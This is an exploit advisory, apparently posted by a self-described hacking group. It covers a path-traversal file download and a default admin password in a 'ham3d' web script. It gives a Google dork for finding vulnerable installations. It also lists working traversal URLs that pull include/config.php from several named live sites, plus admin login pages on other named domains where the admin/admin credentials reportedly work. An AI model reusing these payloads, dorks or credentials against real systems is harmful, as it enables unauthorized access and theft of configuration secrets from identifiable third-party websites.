/***********************************************************************************
** Exploit Title:  ham3d Information Processing Script Local File Download & Default Password Vulnerability
**
** Exploit Author:  Milad Hacking
**
** Vendor Homepage : http://www.ham3d.net/
**
** Demo Script Link: http://wensoni.com
**
** Version : 1.1
**
** Google Dork : inurl:fa/forgotpass.html
**
** Date: 2019-10-25
**
** Tested on:  Kali Linux  /  lceweasel
**
***********************************************************************************
** Demo :

http://123cookie.ir/ajax.php?download=../include/config.php

http://1q1.ir/ajax.php?download=../include/config.php

http://emitice.ir/ajax.php?download=../include/config.php

http://wensoni.com/ajax.php?download=../include/config.php

http://tiamnetworks.ir/ajax.php?download=../include/config.php

http://assc.ir/ajax.php?download=../include/config.php

User * Password With Login  : admin

http://www.5040.ir/report/admin/

http://www.shoaco.com/admin951shoaco/index.php?login

http://quran.kish.ir/admin159357kishetrat2486/?login

http://setareganzamin.com/ADMIN123654789SETAREGANEZAMIN/index.php?login

http://assc.ir/admin/?forgot_password#?login

***********************************************************************************
** Special thanks to:  iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Mahsa Black - Azinista
Mahdi Cocain - Vahid Elmi 
Long Love Ashiyane <3
***********************************************************************************
https://tlgm.me/Milad_Hacking
http://instagram.com/Milad.Hacking
milad.hacking.blackhat@Gmail.com

***********************************************************************************